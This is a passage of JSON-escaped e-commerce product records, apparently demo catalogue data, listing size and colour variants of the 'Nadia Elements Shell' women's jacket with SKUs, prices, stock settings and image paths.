Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-xs-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Yellow\"},\"1289\":{\"sku\":\"WJ10-S-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-S-Black\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-s-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Black\"},\"1290\":{\"sku\":\"WJ10-S-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-S-Orange\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-s-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Orange\"},\"1291\":{\"sku\":\"WJ10-S-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-S-Yellow\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-s-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Yellow\"},\"1292\":{\"sku\":\"WJ10-M-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-M-Black\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-m-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Black\"},\"1293\":{\"sku\":\"WJ10-M-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-M-Orange\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-m-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Orange\"},\"1294\":{\"sku\":\"WJ10-M-Yellow\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-M-Yellow\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-m-yellow\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Yellow\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"image\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-yellow_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/j\\/wj10-yellow_alt1.jpg,\\/w\\/j\\/wj10-yellow_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Yellow\"},\"1295\":{\"sku\":\"WJ10-L-Black\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-L-Black\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-l-black\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Black\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/j\\/wj10-black_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Black\"},\"1296\":{\"sku\":\"WJ10-L-Orange\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Jackets,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Performance Fabrics,Default Category\",\"product_websites\":\"base\",\"name\":\"Nadia Elements Shell-L-Orange\",\"description\":\"<p>Protect yourself from wind and rain in the stylish Nadia Elements Shell. It repels water using hydro-resistant fabric, with fleece lining that adds a touch of warmth. It\'s finished with bold contrast zippers, adjustable cuffs and a hood.<\\/p>\\n<p>&bull; Zippered front. <br \\/>&bull; Zippered side pockets. <br \\/>&bull; Drawstring-adjustable waist and hood. <br \\/>&bull; Machine wash\\/line dry.<br \\/>&bull; Light blue 1\\/4 zip pullover.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"69\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"nadia-elements-shell-l-orange\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/j\\/wj10-orange_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Orange\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qt